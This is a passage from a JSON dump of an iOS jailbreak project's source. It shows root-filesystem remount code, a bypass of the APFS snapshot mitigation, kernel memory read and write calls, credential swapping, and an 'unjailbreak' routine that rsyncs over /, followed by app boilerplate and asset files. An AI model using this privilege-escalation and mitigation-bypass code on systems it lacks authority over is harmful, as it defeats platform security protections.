    "content": "// Thanks to the Electra Team and Pwn20wnd!\n/* APFS snapshot mitigation bypass bug by CoolStar, exploitation by Pwn20wnd */\n/* Disables the new APFS snapshot mitigations introduced in iOS 11.3 */\n\n#include <stdio.h>\n#import <sys/snapshot.h>\n#include <sys/stat.h>\n#include <sys/mount.h>\n#include <CoreFoundation/CoreFoundation.h>\n#include \"rootfs_remount.h\"\n#include \"snapshot_tools.h\"\n#include <spawn.h>\n#include \"../Exploits/sock_port/kernel_memory.h\"\n#include \"../Exploits/sock_port/exploit.h\"\n#include \"../Kernel Utilities/kernel_utils.h\"\n#include \"../PatchFinder/patchfinder64.h\"\n#include \"../Kernel Utilities/kexecute.h\"\n#include \"../Exploits/sock_port/offsetof.h\"\n#include \"../Kernel Utilities/system_reboot.h\"\n#include \"../Blizzard Jailbreak/BlizzardLog.h\"\n#include \"../Blizzard Jailbreak/blizzardJailbreak.h\"\n#include \"../APFS Utilities/snapshot_tools.h\"\n#define ROOTFSTESTFILE \"/.BlizzardJB\"\n#define ROOTFSMNT \"/var/rootfsmnt\"\n#define APPLESNAP \"com.apple.os.update-\"\n#include \"../Kernel Utilities/kernSymbolication.h\"\n\nuint64_t offset_vfs_context_current;\nuint64_t offset_vnode_lookup;\nuint64_t offset_vnode_put;\nchar *diskLocation = \"/dev/disk0s1s1\";\nint shouldReboot = 0;\nvoid dumpContentsOfDir(char *path);\n\n// From http://newosxbook.com/src.jl?tree=&file=/xnu-1504.15.3/bsd/hfs/hfs_mount.h\nstruct hfs_mount_args {\n    char       *fspec;                                       /* block special device to mount */\n    uid_t      hfs_uid;                                      /* uid that owns hfs files (standard HFS only) */\n    gid_t      hfs_gid;                                      /* gid that owns hfs files (standard HFS only) */\n    mode_t     hfs_mask;                                     /* mask to be applied for hfs perms  (standard HFS only) */\n    u_int32_t  hfs_encoding;                                 /* encoding for this volume (standard HFS only) */\n    struct     timezone 
hfs_timezone;                        /* user time zone info (standard HFS only) */\n    int        flags;                                        /* mounting flags, see below */\n    int        journal_tbuffer_size;                         /* size in bytes of the journal transaction buffer */\n    int        journal_flags;                                /* flags to pass to journal_open/create */\n    int        journal_disable;                              /* don't use journaling (potentially dangerous) */\n};\n\nint file_exists(const char *filename) {\n    int r = access(filename, F_OK);\n    return (r == 0);\n}\n\nstatic uint64_t _vnode_lookup = 0;\nstatic uint64_t _vnode_put = 0;\nstatic uint64_t _vfs_context_current = 0;\n\nint vnode_lookup(const char *path, int flags, uint64_t *vnode, uint64_t vfs_context) {\n    \n    size_t len = strlen(path) + 1;\n    uint64_t ptr = kalloc(8);\n    uint64_t ptr2 = kalloc(len);\n    kwrite(ptr2, path, len);\n    \n    _vnode_lookup = find_symbol(\"_vnode_lookup\", false);\n    if (!_vnode_lookup) _vnode_lookup = Find_vnode_lookup();\n    else _vnode_lookup += kernel_slide;\n    \n    if (kexecute(_vnode_lookup, ptr2, flags, ptr, vfs_context, 0, 0, 0)) {\n        return -1;\n    }\n    *vnode = rk64(ptr);\n    kfree(ptr2, len);\n    kfree(ptr, 8);\n    return 0;\n}\n\nuint64_t get_vfs_context() {\n    _vfs_context_current = find_symbol(\"_vfs_context_current\", false);\n    if (!_vfs_context_current) _vfs_context_current = Find_vfs_context_current();\n    else _vfs_context_current += kernel_slide;\n    return ZmFixAddr(kexecute(_vfs_context_current, 1, 0, 0, 0, 0, 0, 0));\n}\n\nint vnode_put(uint64_t vnode) {\n    _vnode_put = find_symbol(\"_vnode_put\", false);\n    if (!_vnode_put) _vnode_put = Find_vnode_put();\n    else _vnode_put += kernel_slide;\n    return (int)kexecute(_vnode_put, vnode, 0, 0, 0, 0, 0, 0);\n}\n\nint mountDevAtPathAsRW(const char* devpath, const char* path) {\n    struct hfs_mount_args mntargs;\n    
bzero(&mntargs, sizeof(struct hfs_mount_args));\n    mntargs.fspec = (char*)devpath;\n    mntargs.hfs_mask = 1;\n    gettimeofday(NULL, &mntargs.hfs_timezone);\n    int rvtmp = mount(\"apfs\", path, 0, (void *)&mntargs);\n    perror(\"mount\");\n    return rvtmp;\n}\n\nuint64_t getVnodeAtPath(const char *path) {\n    uint64_t *vnode_ptr = (uint64_t *)malloc(8);\n    if (vnode_lookup(path, 0, vnode_ptr, get_vfs_context())) {\n        printf(\"ROOT FS REMOUNT: Unable to get vnode from path for %s\\n\", path);\n        free(vnode_ptr);\n        return -1;\n    }\n    else {\n        uint64_t vnode = *vnode_ptr;\n        free(vnode_ptr);\n        printf(\"GOT VNODE: 0x%llx\\n\", vnode);\n        return vnode;\n    }\n}\n\nBOOL remount1126() {\n    uint64_t rootfs_vnode = getVnodeAtPath(\"/\");\n    printf(\"\\nROOT FS REMOUNT: vnode of /: 0x%llx\\n\", rootfs_vnode);\n    uint64_t v_mount = rk64(rootfs_vnode + off_v_mount);\n    uint32_t v_flag = rk32(v_mount + off_mnt_flag);\n    printf(\"ROOT FS REMOUNT: Clearing FS Flags\\n\");\n    printf(\"ROOT FS REMOUNT: Flags before 0x%x\\n\", v_flag);\n    v_flag &= ~MNT_NOSUID;\n    v_flag &= ~MNT_RDONLY;\n    v_flag &= ~MNT_ROOTFS;\n    \n    printf(\"ROOT FS REMOUNT: Flags after 0x%x\\n\", v_flag);\n    wk32(v_mount + off_mnt_flag, v_flag);\n    \n    char *nmz = strdup(\"/dev/disk0s1s1\");\n    int rv = mount(\"apfs\", \"/\", MNT_UPDATE, (void *)&nmz);\n    free(nmz);\n    printf(\"ROOT FS REMOUNT: Remounting /, return value = %d\\n\", rv);\n    v_mount = rk64(rootfs_vnode + off_v_mount);\n    wk32(v_mount + off_mnt_flag, v_flag);\n    \n    int fd = open(\"/RWTEST\", O_RDONLY);\n    if (fd == -1) {\n        fd = creat(\"/RWTEST\", 0777);\n    } else {\n        printf(\"ROOT FS REMOUNT: File already exists! Good!\\n\");\n    }\n    close(fd);\n    printf(\"ROOT FS REMOUNT: %s\\n\", [[NSFileManager defaultManager] fileExistsAtPath:@\"/RWTEST\"] ? 
\"Successful!\" : \"FAILED!\");\n    return [[NSFileManager defaultManager] fileExistsAtPath:@\"/RWTEST\"] ? YES : NO;\n}\n\nint remountRootFS() {\n    int rv = -1, ret = -1;\n    if (kCFCoreFoundationVersionNumber > 1451.51 && list_snapshots(\"/\")) {\n        printf(\"****** DOING THE HARD REMOUNT ******\\n\");\n        shouldReboot = 1;\n        uint64_t devVnode = getVnodeAtPath(\"/dev/disk0s1s1\");\n        if (devVnode == 0 || devVnode == -1){\n            printf(\"FAIL!\\n\");\n            return -1;\n        }\n        uint64_t specinfo = rk64(devVnode + off_v_specinfo);\n        wk32(specinfo + off_specflags, 0);\n        if ([[NSFileManager defaultManager] fileExistsAtPath:@\"/var/rootfsmnt\"])\n            rmdir(\"/var/rootfsmnt\");\n        \n        mkdir(\"/var/rootfsmnt\", 0777);\n        chown(\"/var/rootfsmnt\", 0, 0);\n        printf(\"ROOT FS REMOUNT: Temporarily setting kernel credentials\\n\");\n        uint64_t creds = copyPIDCredentials(getpid(), 0);\n        if (mountDevAtPathAsRW(\"/dev/disk0s1s1\", \"/var/rootfsmnt\")) {\n            printf(\"ROOT FS REMOUNT: Error mounting root at %s\\n\", \"/var/rootfsmnt\");\n        }\n        else {\n            printf(\"ROOT FS REMOUNT: Disabling the APFS snapshot mitigations\\n\");\n            char *snap = find_system_snapshot();\n            if (snap && !renameAPFSSnapshot(\"/var/rootfsmnt\", snap, \"orig-fs\")) {\n                rv = 0;\n                unmount(\"/var/rootfsmnt\", 0);\n                rmdir(\"/var/rootfsmnt\");\n            }\n        }\n        printf(\"ROOT FS REMOUNT: Restoring our credentials\\n\");\n        uint64_t proc_smp = proc_of_pid(getpid());\n        wk64(proc_smp + off_p_ucred, creds);\n        vnode_put(devVnode);\n        if (rv) {\n            printf(\"ROOT FS REMOUNT: Failed to disable the APFS snapshot mitigations\\n\");\n        }\n        else {\n            printf(\"ROOT FS REMOUNT: Disabled the APFS snapshot mitigations\\n\");\n            ret = 0;\n       
 }\n    }\n    else {\n        shouldReboot = 0;\n        ret = 0;\n        remount1126();\n    }\n    return ret;\n}\n\nextern char* const* environ;\nint spawnBinaryWithArgs(NSURL *launchPath,NSArray *arguments) {\n    NSMutableArray *posixSpawnArguments=[arguments mutableCopy];\n    [posixSpawnArguments insertObject:[launchPath lastPathComponent] atIndex:0];\n    int argc=(int)posixSpawnArguments.count+1;\n    printf(\"Number of posix_spawn arguments: %d\\n\",argc);\n    char **args=(char**)calloc(argc,sizeof(char *));\n    for (int i=0; i<posixSpawnArguments.count; i++)\n        args[i]=(char *)[posixSpawnArguments[i]UTF8String];\n    \n    printf(\"File exists at launch path: %d\\n\",[[NSFileManager defaultManager]fileExistsAtPath:launchPath.path]);\n    printf(\"Executing %s: %s\\n\",launchPath.path.UTF8String,arguments.description.UTF8String);\n    posix_spawn_file_actions_t action;\n    posix_spawn_file_actions_init(&action);\n    pid_t pid;\n    int status;\n    status = posix_spawn(&pid, launchPath.path.UTF8String, &action, NULL, args, environ);\n    if (status == 0) {\n        if (waitpid(pid, &status, 0) != -1) {\n            \n        }\n    }\n    posix_spawn_file_actions_destroy(&action);\n    free(args);\n    return status;\n}\n\nint checkifFileExistsAndWait(const char *filename) {\n    int rv = 0;\n    rv = access(filename, F_OK);\n    for (int i = 0; !(i >= 100 || rv == 0); i++) {\n        usleep(100000);\n        rv = access(filename, F_OK);\n    }\n    return rv;\n}\n\nconst char *systemSnapshot(char *bootHash) {\n    if (!bootHash) {\n        return NULL;\n    }\n    return [[NSString stringWithFormat:@APPLESNAP @\"%s\", bootHash] UTF8String];\n}\n\nint unjailbreakBlizzard(){\n    printf(\"Blizzard Unjailbreak: Temporarily setting kernel credentials\\n\");\n    uint64_t creds = copyPIDCredentials(getpid(), 0);\n    if (kCFCoreFoundationVersionNumber < 1452.23) {\n        int retval = fs_snapshot_rename(open(\"/\", O_RDONLY, 0), \"orig-fs\", 
systemSnapshot(copyBootHash()), 0);\n        if (access(\"/var/MobileSoftwareUpdate/mnt1\", F_OK)) {\n            int retv = mkdir(\"/var/MobileSoftwareUpdate/mnt1\", 0755);\n            if (retv != 0){\n                printf(\"Blizzard Unjailbreak: Failed to unjailbreak. Cannot access /var/MobileSoftwareUpdate/mnt1\\n\");\n                printf(\"Blizzard Unjailbreak: Restoring our credentials\\n\");\n                uint64_t proc_smp = proc_of_pid(getpid());\n                wk64(proc_smp + off_p_ucred, creds);\n                return -1;\n            }\n        }\n        if (retval == 0){\n            printf(\"Blizzard Unjailbreak: Successfully restored the default APFS Snapshot!\\n\");\n            if (verifySnapshot(\"/\", \"orig-fs\") == 1) {\n                retval = spawnBinaryWithArgs([NSURL fileURLWithPath:@\"/sbin/mount_apfs\"], @[@\"-s\", @\"orig-fs\", @\"/\", @\"/var/MobileSoftwareUpdate/mnt1\"]);\n            } else {\n                retval = spawnBinaryWithArgs([NSURL fileURLWithPath:@\"/sbin/mount_apfs\"], @[@\"-s\", [NSString stringWithFormat:@\"%s\", systemSnapshot(copyBootHash())], @\"/\", @\"/var/MobileSoftwareUpdate/mnt1\"]);\n            }\n            \n            retval = checkifFileExistsAndWait(\"/var/MobileSoftwareUpdate/mnt1/sbin/launchd\");\n            if (retval == 0){\n                retval = spawnBinaryWithArgs([NSURL fileURLWithPath:@\"/usr/bin/rsync\"], @[@\"-vaxcH\", @\"--progress\", @\"--delete-after\", @\"/var/MobileSoftwareUpdate/mnt1/.\", @\"/\"]);\n                if (retval == 0){\n                    printf(\"Blizzard Unjailbreak: Restoring our credentials\\n\");\n                    uint64_t proc_smp = proc_of_pid(getpid());\n                    wk64(proc_smp + off_p_ucred, creds);\n                    return 0;\n                }\n            }\n        }\n    } else {\n        int retvalue = fs_snapshot_rename(open(\"/\", O_RDONLY, 0), \"orig-fs\", systemSnapshot(copyBootHash()), 0);\n        if (retvalue == 0){\n 
           printf(\"Blizzard Unjailbreak: Restoring our credentials\\n\");\n            uint64_t proc_smp = proc_of_pid(getpid());\n            wk64(proc_smp + off_p_ucred, creds);\n            return 0;\n        }\n    }\n    return 0;\n}\n"
  },
  {
    "path": "APFS Utilities/snapshot_tools.c",
    "content": "#import \"../Kernel Utilities/kernel_utils.h\"\n#import \"../PatchFinder/patchfinder64.h\"\n#import \"../Exploits/sock_port/offsetof.h\"\n#import \"../Exploits/sock_port/offsets.h\"\n#import <sys/snapshot.h>\n#include \"../Exploits/sock_port/include/IOKit/IOKitLib.h\"\n#import <stdlib.h>\n#import <signal.h>\n#import <sys/attr.h>\n#include \"snapshot_tools.h\"\n#include \"../Blizzard Jailbreak/BlizzardSpawnerTools.h\"\n#include \"../Blizzard Jailbreak/blizzardJailbreak.h\"\n\ntypedef struct val_attrs {\n    uint32_t          length;\n    attribute_set_t   returned;\n    attrreference_t   name_info;\n} val_attrs_t;\n\nint list_snapshots(const char *vol){\n    int dirfd = open(vol, O_RDONLY, 0);\n    if (dirfd < 0) {\n        perror(\"get_dirfd\");\n        printf(\"List Snapshots: Failed to open file descriptor!\\n\");\n        return -1;\n    }\n    struct attrlist alist = { 0 };\n    char abuf[2048];\n    alist.commonattr = ATTR_BULK_REQUIRED;\n    int count = fs_snapshot_list(dirfd, &alist, &abuf[0], sizeof (abuf), 0);\n    if (count < 0) {\n        perror(\"fs_snapshot_list\");\n        printf(\"List Snapshots: Failed to list Snapshots!\\n\");\n        return -1;\n    }\n    char *p = &abuf[0];\n    for (int i = 0; i < count; i++) {\n        char *field = p;\n        uint32_t len = *(uint32_t *)field;\n        field += sizeof (uint32_t);\n        attribute_set_t attrs = *(attribute_set_t *)field;\n        field += sizeof (attribute_set_t);\n        \n        if (attrs.commonattr & ATTR_CMN_NAME) {\n            attrreference_t ar = *(attrreference_t *)field;\n            char *name = field + ar.attr_dataoffset;\n            field += sizeof (attrreference_t);\n            (void) printf(\"\\t ->> %s\\n\", name);\n        }\n        \n        p += len;\n    }\n    return (0);\n}\n\nchar *copyBootHash() {\n    io_registry_entry_t chosen = IORegistryEntryFromPath(kIOMasterPortDefault, \"IODeviceTree:/chosen\");\n    unsigned char buf[1024];\n    
uint32_t size = 1024;\n    char *hash;\n    if (chosen && chosen != -1) {\n        kern_return_t ret = IORegistryEntryGetProperty(chosen, \"boot-manifest-hash\", (char*)buf, &size);\n        IOObjectRelease(chosen);\n        if (ret) {\n            printf(\"List Snapshots: Unable to read boot-manifest-hash\\n\");\n            hash = NULL;\n        }\n        else {\n            char *result = (char*)malloc((2 * size) | 1);\n            memset(result, 0, (2 * size) | 1);\n            \n            int i = 0;\n            while (i < size) {\n                unsigned char ch = buf[i];\n                sprintf(result + 2 * i++, \"%02X\", ch);\n            }\n            printf(\"List Snapshots: Hash: %s\\n\", result);\n            hash = strdup(result);\n        }\n    }\n    else {\n        printf(\"List Snapshots: Unable to get IODeviceTree:/chosen port\\n\");\n        hash = NULL;\n    }\n    return hash;\n}\n\nchar *find_system_snapshot() {\n    const char *hash = copyBootHash();\n    size_t len = strlen(hash);\n    char *str = (char*)malloc(len + 29);\n    memset(str, 0, len + 29);\n    if (!hash) return 0;\n    sprintf(str, \"com.apple.os.update-%s\", hash);\n    printf(\"List Snapshots: System snapshot: %s\\n\", str);\n    return str;\n}\n\nint createNewAPFSSnapshot(const char *volume, const char *snapshot) {\n    int retvalue;\n    printf(\"APFS Utilities: Preparing to create a new Snapshot...\\n\");\n    int fileDescriptor = get_dirfd(volume);\n    if (fileDescriptor < 0) {\n        perror(\"open\");\n        printf(\"APFS Utilities: Failed to create a Snapshot! Error at get_dirfd.\\n\");\n        return -1;\n    }\n    retvalue = fs_snapshot_create(fileDescriptor, snapshot, 0);\n    close(fileDescriptor);\n    if (retvalue != 0) {\n        perror(\"fs_snapshot_create\");\n        printf(\"APFS Utilities: Failed to create a Snapshot! 
Error at fs_snapshot_create()\\n\");\n        return -1;\n    }\n    return 0;\n}\n\nint renameAPFSSnapshot(const char *volume, const char *snapshot, const char *nw) {\n    int retvalue;\n    int fileDescriptor = open(volume, O_RDONLY);\n    if (fileDescriptor < 0) {\n        perror(\"open\");\n        printf(\"APFS Utilities: RENAME: Cannot open file descriptor.\\n\");\n        return -1;\n    }\n    retvalue = fs_snapshot_rename(fileDescriptor, snapshot, nw, 0);\n    close(fileDescriptor);\n    if (retvalue != 0) {\n        perror(\"fs_snapshot_rename\\n\");\n        printf(\"APFS Utilities: RENAME: Failed to rename a Snapshot! Error at fs_snapshot_rename()\\n\");\n    }\n    return 0;\n}\n\nint verifySnapshot(const char *vol, const char *name){\n    struct attrlist attr_list = { 0 };\n    attr_list.commonattr = ATTR_BULK_REQUIRED;\n    char *buf = (char*)calloc(2048, sizeof(char));\n    int retcount;\n    int fd = open(vol, O_RDONLY, 0);\n    while ((retcount = fs_snapshot_list(fd, &attr_list, buf, 2048, 0))>0) {\n        char *bufref = buf;\n        for (int i=0; i<retcount; i++) {\n            val_attrs_t *entry = (val_attrs_t *)bufref;\n            if (entry->returned.commonattr & ATTR_CMN_NAME) {\n                printf(\"%s\\n\", (char*)(&entry->name_info) + entry->name_info.attr_dataoffset);\n                if (strstr((char*)(&entry->name_info) + entry->name_info.attr_dataoffset, name)){\n                    return 1;\n                }\n            }\n            bufref += entry->length;\n        }\n    }\n    free(buf);\n    close(fd);\n    \n    if (retcount < 0) {\n        perror(\"fs_snapshot_list\");\n        printf(\"List Snapshots: Failed to list snapshots!\\n\");\n        return -1;\n    }\n    return 0;\n}\n\nint mountSnapshot(const char *vol, const char *name, const char *dir) {\n    int proces_pid;\n    proces_pid = launchProcessFrozen(\"/sbin/mount_apfs\", \"-s\", (char *)name, (char *)vol, (char *)dir, NULL, NULL, NULL);\n    
copyPIDCredentials(proces_pid, 0);\n    kill(proces_pid, SIGCONT);\n    int a;\n    if (proces_pid != -1) waitpid(proces_pid, &a, 0);\n    return WEXITSTATUS(a);\n}\n"
  },
  {
    "path": "APFS Utilities/snapshot_tools.h",
    "content": "#ifndef apfs_util_h\n#define apfs_util_h\n\n#define get_dirfd(vol) open(vol, O_RDONLY, 0)\n\nchar *find_snapshot_with_ref(const char *vol, const char *ref);\nchar *find_system_snapshot(void);\n\nint createNewAPFSSnapshot(const char *volume, const char *snapshot);\nint renameAPFSSnapshot(const char *volume, const char *snapshot, const char *nw);\nint list_snapshots(const char *vol);\nint check_snapshot(const char *vol, const char *snap);\nchar *copyBootHash(void);\nint renameAPFSSnapshot(const char *vol, const char *snap, const char *nw);\nint verifySnapshot(const char *vol, const char *name);\n#endif\n/* apfs_util_h */\n"
  },
  {
    "path": "Blizzard Jailbreak/AppDelegate.h",
    "content": "//\n//  AppDelegate.h\n//  sock_port\n//\n//  Created by Jake James on 7/17/19.\n//  Copyright © 2019 Jake James. All rights reserved.\n//\n\n#import <UIKit/UIKit.h>\n\n@interface AppDelegate : UIResponder <UIApplicationDelegate>\n\n@property (strong, nonatomic) UIWindow *window;\n\n\n@end\n\n"
  },
  {
    "path": "Blizzard Jailbreak/AppDelegate.m",
    "content": "//\n//  AppDelegate.m\n//  sock_port\n//\n//  Created by Jake James on 7/17/19.\n//  Copyright © 2019 Jake James. All rights reserved.\n//\n\n#import \"AppDelegate.h\"\n\n@interface AppDelegate ()\n\n@end\n\n@implementation AppDelegate\n\n\n- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {\n    return YES;\n}\n\n\n- (void)applicationWillResignActive:(UIApplication *)application {\n    // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.\n    // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.\n}\n\n\n- (void)applicationDidEnterBackground:(UIApplication *)application {\n    // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.\n    // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.\n}\n\n\n- (void)applicationWillEnterForeground:(UIApplication *)application {\n    // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.\n}\n\n\n- (void)applicationDidBecomeActive:(UIApplication *)application {\n    // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.\n}\n\n\n- (void)applicationWillTerminate:(UIApplication *)application {\n    // Called when the application is about to terminate. Save data if appropriate. 
See also applicationDidEnterBackground:.\n}\n\n\n@end\n"
  },
  {
    "path": "Blizzard Jailbreak/Assets.xcassets/AppIcon.appiconset/Contents.json",
    "content": "{\n  \"images\" : [\n    {\n      \"size\" : \"20x20\",\n      \"idiom\" : \"iphone\",\n      \"filename\" : \"notification-icon@2x.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"size\" : \"20x20\",\n      \"idiom\" : \"iphone\",\n      \"filename\" : \"notification-icon@3x.png\",\n      \"scale\" : \"3x\"\n    },\n    {\n      \"size\" : \"29x29\",\n      \"idiom\" : \"iphone\",\n      \"filename\" : \"icon-small.png\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"size\" : \"29x29\",\n      \"idiom\" : \"iphone\",\n      \"filename\" : \"icon-small@2x.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"size\" : \"29x29\",\n      \"idiom\" : \"iphone\",\n      \"filename\" : \"icon-small@3x.png\",\n      \"scale\" : \"3x\"\n    },\n    {\n      \"size\" : \"40x40\",\n      \"idiom\" : \"iphone\",\n      \"filename\" : \"icon-40@2x.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"size\" : \"40x40\",\n      \"idiom\" : \"iphone\",\n      \"filename\" : \"icon-40@3x.png\",\n      \"scale\" : \"3x\"\n    },\n    {\n      \"size\" : \"57x57\",\n      \"idiom\" : \"iphone\",\n      \"filename\" : \"icon.png\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"size\" : \"57x57\",\n      \"idiom\" : \"iphone\",\n      \"filename\" : \"icon@2x.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"size\" : \"60x60\",\n      \"idiom\" : \"iphone\",\n      \"filename\" : \"icon-60@2x.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"size\" : \"60x60\",\n      \"idiom\" : \"iphone\",\n      \"filename\" : \"icon-60@3x.png\",\n      \"scale\" : \"3x\"\n    },\n    {\n      \"size\" : \"20x20\",\n      \"idiom\" : \"ipad\",\n      \"filename\" : \"notification-icon~ipad.png\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"size\" : \"20x20\",\n      \"idiom\" : \"ipad\",\n      \"filename\" : \"notification-icon~ipad@2x.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"size\" : \"29x29\",\n      \"idiom\" : 
\"ipad\",\n      \"filename\" : \"icon-small.png\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"size\" : \"29x29\",\n      \"idiom\" : \"ipad\",\n      \"filename\" : \"icon-small@2x.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"size\" : \"40x40\",\n      \"idiom\" : \"ipad\",\n      \"filename\" : \"icon-40.png\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"size\" : \"40x40\",\n      \"idiom\" : \"ipad\",\n      \"filename\" : \"icon-40@2x.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"size\" : \"50x50\",\n      \"idiom\" : \"ipad\",\n      \"filename\" : \"icon-small-50.png\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"size\" : \"50x50\",\n      \"idiom\" : \"ipad\",\n      \"filename\" : \"icon-small-50@2x.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"size\" : \"72x72\",\n      \"idiom\" : \"ipad\",\n      \"filename\" : \"icon-72.png\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"size\" : \"72x72\",\n      \"idiom\" : \"ipad\",\n      \"filename\" : \"icon-72@2x.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"size\" : \"76x76\",\n      \"idiom\" : \"ipad\",\n      \"filename\" : \"icon-76.png\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"size\" : \"76x76\",\n      \"idiom\" : \"ipad\",\n      \"filename\" : \"icon-76@2x.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"size\" : \"83.5x83.5\",\n      \"idiom\" : \"ipad\",\n      \"filename\" : \"icon-83.5@2x.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"size\" : \"1024x1024\",\n      \"idiom\" : \"ios-marketing\",\n      \"filename\" : \"ios-marketing.png\",\n      \"scale\" : \"1x\"\n    }\n  ],\n  \"info\" : {\n    \"version\" : 1,\n    \"author\" : \"xcode\"\n  }\n}"
  },
  {
    "path": "Blizzard Jailbreak/Assets.xcassets/Contents.json",
    "content": "{\n  \"info\" : {\n    \"version\" : 1,\n    \"author\" : \"xcode\"\n  }\n}"
  },
  {
    "path": "Blizzard Jailbreak/Assets.xcassets/button_mask.imageset/Contents.json",
    "content": "{\n  \"images\" : [\n    {\n      \"idiom\" : \"universal\",\n      \"filename\" : \"button_mask.png\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"idiom\" : \"universal\",\n      \"filename\" : \"button_mask-1.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"idiom\" : \"universal\",\n      \"filename\" : \"button_mask-2.png\",\n      \"scale\" : \"3x\"\n    }\n  ],\n  \"info\" : {\n    \"version\" : 1,\n    \"author\" : \"xcode\"\n  }\n}"
  },
  {
    "path": "Blizzard Jailbreak/Assets.xcassets/jailbreak_wallpaper.imageset/Contents.json",
    "content": "{\n  \"images\" : [\n    {\n      \"idiom\" : \"universal\",\n      \"filename\" : \"jailbreak_wallpaper.png\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"idiom\" : \"universal\",\n      \"filename\" : \"jailbreak_wallpaper-1.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"idiom\" : \"universal\",\n      \"filename\" : \"jailbreak_wallpaper-2.png\",\n      \"scale\" : \"3x\"\n    }\n  ],\n  \"info\" : {\n    \"version\" : 1,\n    \"author\" : \"xcode\"\n  }\n}"
  },
  {
    "path": "Blizzard Jailbreak/Assets.xcassets/snow.imageset/Contents.json",
    "content": "{\n  \"images\" : [\n    {\n      \"idiom\" : \"universal\",\n      \"filename\" : \"snow.png\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"idiom\" : \"universal\",\n      \"filename\" : \"snow-1.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"idiom\" : \"universal\",\n      \"filename\" : \"snow-2.png\",\n      \"scale\" : \"3x\"\n    }\n  ],\n  \"info\" : {\n    \"version\" : 1,\n    \"author\" : \"xcode\"\n  }\n}"
  },
  {
    "path": "Blizzard Jailbreak/Assets.xcassets/winter.imageset/Contents.json",
    "content": "{\n  \"images\" : [\n    {\n      \"idiom\" : \"universal\",\n      \"filename\" : \"winter.png\",\n      \"scale\" : \"1x\"\n    },\n    {\n      \"idiom\" : \"universal\",\n      \"filename\" : \"winter-1.png\",\n      \"scale\" : \"2x\"\n    },\n    {\n      \"idiom\" : \"universal\",\n      \"filename\" : \"winter-2.png\",\n      \"scale\" : \"3x\"\n    }\n  ],\n  \"info\" : {\n    \"version\" : 1,\n    \"author\" : \"xcode\"\n  }\n}"
  },
  {
    "path": "Blizzard Jailbreak/Base.lproj/LaunchScreen.storyboard",
    "content": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<document type=\"com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB\" version=\"3.0\" toolsVersion=\"14460.31\" targetRuntime=\"iOS.CocoaTouch\" propertyAccessControl=\"none\" useAutolayout=\"YES\" launchScreen=\"YES\" useTraitCollections=\"YES\" useSafeAreas=\"YES\" colorMatched=\"YES\" initialViewController=\"01J-lp-oVM\">\n    <device id=\"retina4_0\" orientation=\"portrait\">\n        <adaptation id=\"fullscreen\"/>\n    </device>\n    <dependencies>\n        <deployment identifier=\"iOS\"/>\n        <plugIn identifier=\"com.apple.InterfaceBuilder.IBCocoaTouchPlugin\" version=\"14460.20\"/>\n        <capability name=\"Safe area layout guides\" minToolsVersion=\"9.0\"/>\n        <capability name=\"documents saved in the Xcode 8 format\" minToolsVersion=\"8.0\"/>\n    </dependencies>\n    <scenes>\n        <!--View Controller-->\n        <scene sceneID=\"EHf-IW-A2E\">\n            <objects>\n                <viewController id=\"01J-lp-oVM\" sceneMemberID=\"viewController\">\n                    <view key=\"view\" contentMode=\"scaleToFill\" id=\"Ze5-6b-2t3\">\n                        <rect key=\"frame\" x=\"0.0\" y=\"0.0\" width=\"320\" height=\"568\"/>\n                        <autoresizingMask key=\"autoresizingMask\" widthSizable=\"YES\" heightSizable=\"YES\"/>\n                        <subviews>\n                            <imageView userInteractionEnabled=\"NO\" contentMode=\"scaleToFill\" horizontalHuggingPriority=\"251\" verticalHuggingPriority=\"251\" image=\"jailbreak_wallpaper\" translatesAutoresizingMaskIntoConstraints=\"NO\" id=\"7k9-n9-bzj\">\n                                <rect key=\"frame\" x=\"0.0\" y=\"0.0\" width=\"320\" height=\"568\"/>\n                            </imageView>\n                            <imageView userInteractionEnabled=\"NO\" contentMode=\"scaleAspectFit\" horizontalHuggingPriority=\"251\" verticalHuggingPriority=\"251\" image=\"winter\" 
